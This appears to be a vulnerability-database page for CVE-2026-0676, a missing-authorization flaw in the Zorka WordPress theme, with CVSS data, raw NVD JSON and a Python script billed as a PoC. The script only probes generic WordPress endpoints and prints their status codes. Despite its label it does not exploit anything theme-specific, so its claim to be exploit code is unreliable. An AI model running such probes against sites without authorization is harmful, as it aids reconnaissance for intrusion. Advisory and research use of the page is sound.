Security Vulnerability Report
中文
CVE-2026-0676 CVSS 5.3 MEDIUM

CVE-2026-0676

Published: 2026-01-08 10:15:55
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in G5Theme Zorka zorka allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Zorka: from n/a through <= 1.5.7.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Zorka Theme <= 1.5.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-0676 PoC - Zorka Theme Broken Access Control # Affected: Zorka Theme <= 1.5.7 import requests import sys TARGET_URL = "http://target-site.com" def check_vulnerability(): """ Check if the target is vulnerable to CVE-2026-0676 Missing Authorization in Zorka theme """ # Common Zorka theme endpoints that might be affected vulnerable_endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/wp/v2/settings", "/?rest_route=/wp/v2/users" ] print(f"[*] Testing CVE-2026-0676 on {TARGET_URL}") print("[*] Target: Zorka Theme <= 1.5.7") print("[*] Vulnerability: Missing Authorization / Broken Access Control\n") for endpoint in vulnerable_endpoints: url = TARGET_URL + endpoint try: response = requests.get(url, timeout=10, verify=False) # Check for unauthorized access indicators if response.status_code == 200: print(f"[!] Potential vulnerable endpoint found: {endpoint}") print(f" Status: {response.status_code}") print(f" Response length: {len(response.text)} bytes") elif response.status_code == 401: print(f"[*] Endpoint {endpoint} requires authentication (expected)") else: print(f"[*] Endpoint {endpoint} returned status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error testing {endpoint}: {e}") print("\n[*] Note: This is a basic check. Full exploitation requires") print(" manual testing to identify specific vulnerable functions.") print("[*] Recommendation: Upgrade Zorka theme to latest version.") if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0676", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:55.170", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in G5Theme Zorka zorka allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Zorka: from n/a through <= 1.5.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/zorka/vulnerability/wordpress-zorka-theme-1-5-7-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}